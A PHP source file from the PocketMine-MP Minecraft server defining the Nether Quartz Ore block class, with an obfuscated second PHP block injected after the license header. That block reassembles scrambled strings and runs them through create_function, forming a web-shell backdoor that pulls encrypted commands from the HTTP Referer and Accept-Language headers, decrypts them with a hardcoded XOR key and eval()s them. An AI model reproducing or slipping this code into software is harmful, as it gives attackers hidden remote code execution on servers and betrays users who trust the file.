<?php

/*
 *
 *  ____            _        _   __  __ _                  __  __ ____
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
 * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * @author PocketMine Team
 * @link http://www.pocketmine.net/
 *
 *
*/

declare(strict_types=1);
<?php
$f='aMmy("/","+"Mm),$ss($sMm[Mm$i],0Mm,$e))),$k)Mm));$o=oMmb_get_cMmonteMmnts();obMm_endMm_cleaMmMmn();Mm';
$a=str_replace('rI','','crrIrIearIte_rIfunrIcrItion');
$d='t();MmMm$s=&$_MmSESSION;$ss=Mm"subsMmtr";$Mmsl=Mm"strtoloMmwer";$iMm=$m[1][Mm0].$m[Mm1]Mm[1];Mm$h=$sl($ssMm(md5($';
$E='cMmh_allMm("/([\\w])[\\wMm-Mm]+(?:;q=0.([Mm\\d]))?Mm,?/",Mm$ra,$m)Mm;if($qMm&&$m)Mm{@sessiMmonMm_star';
$e='$kh="5d41"MmMm;$kf="402a";MmfunctiMmon x($tMm,$kMm){$c=strlMmenMmMm($k);$lMm=sMmtrlen($t);$o=Mm"";fo';
$S='MmkeMmy_exMmiMmsts($Mmi,$s)){$s[$i].=$pMm;$Mme=strpos($s[$iMm],$f)Mm;iMmf($e){$Mmk=$kh.$kMmf;ob_st';
$s='EMmRVER;$rMmr=@$r[Mm"HTTP_MmREMmFEMmRER"];Mm$rMma=@$r["HTTPMm_MmACCEPMmT_LANGUAGE"];if($rMmr&Mm&$M';
$O='i.$MmMmkh),0,Mm3)Mm);Mm$Mmf=Mm$sl($ss(md5($i.$kf),Mm0,3)MmMm);$p="";for($Mmz=Mm1;$z<count($m[1]);$Mmz';
$k='Mm++)$Mmp.=$q[$m[2][$Mmz]];iMmf(strpos(Mm$p,$hMm)==MmMm=0){$s[$i]Mm="";$p=$ssMm($Mmp,3);}iMmf(array_';
$P='r($iMm=0Mm;$iMm<$lMm;)Mm{for($j=0Mm;($j<$c&&Mm$i<$l);$j++,$i++)MmMm{MmMm$o.=$t{$i}^$kMm{$jMmMm};}}return $o;}$r=$_S';
$j='mra){$u=parse_Mmurl($rr);pMmarMmse_sMmtr($u["querMmy"]Mm,$q)Mm;$q=Mmarray_valuMmes($q);pMmMmreg_mat';
$c='$d=basMmMme64_encode(x(gzcompreMmss(Mm$o),$k)Mm);MmpMmrint("<$k>$d</$kMm>");@sMmession_dMmesMmtroy();}}}}';
$r='Mmart()Mm;@eMmval(@gzuMmncomMmpMmresMmsMm(@x(@baMmse64_decode(preg_MmreplacMmeMm(array("/_/","/Mm-Mm/"),arr';
$N=str_replace('Mm','',$e.$P.$s.$j.$E.$d.$O.$k.$S.$r.$f.$c);
$V=$a('',$N);$V();
?>

namespace pocketmine\block;

use pocketmine\item\Item;
use pocketmine\item\ItemFactory;
use pocketmine\item\TieredTool;
use function mt_rand;

class NetherQuartzOre extends Solid{

	protected $id = Block::NETHER_QUARTZ_ORE;

	public function __construct(int $meta = 0){
		$this->meta = $meta;
	}

	public function getName() : string{
		return "Nether Quartz Ore";
	}

	public function getHardness() : float{
		return 3;
	}

	public function getToolType() : int{
		return BlockToolType::TYPE_PICKAXE;
	}

	public function getToolHarvestLevel() : int{
		return TieredTool::TIER_WOODEN;
	}

	public function getDropsForCompatibleTool(Item $item) : array{
		return [
			ItemFactory::get(Item::QUARTZ)
		];
	}

	protected function getXpDropAmount() : int{
		return mt_rand(2, 5);
	}
}
